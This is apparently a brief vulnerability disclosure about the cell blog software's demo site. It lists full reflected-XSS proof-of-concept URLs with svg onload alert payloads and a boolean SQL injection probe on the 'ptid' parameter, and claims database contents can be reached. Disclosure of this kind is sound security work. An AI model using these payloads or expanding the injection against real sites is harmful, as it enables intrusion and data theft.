Well, when I pentest the official demo site of cell blog, I found some vulnerabilities here.
There're some reflect-xss in this system, for example:
http://www.cells.tw/pub_readpost.php?dirpages=1&bgid=1&fmid=2%27%22%3E%3Csvg/onload=alert(/xss/)%3E%3C%27%22&ptid=23
http://www.cells.tw/fotos/?act=showpic&jfdname=..%2Fdata%2Fjpg%2Ftest%22%3E%3Csvg/onload=alert(/xss2/)%3E%3C%27%22&rjfdname=..%2Fdata%2Fjpg%2Ftest%27
http://www.cells.tw/pub_readpost.php?dirpages=1&bgid=1&fmid=2&ptid=23
Weak get key para "ptid":
dirpages=1&bgid=1&fmid=2&ptid=23 AND 2623=2623
You can see, we can obtain the current database tables or more sensitive data now!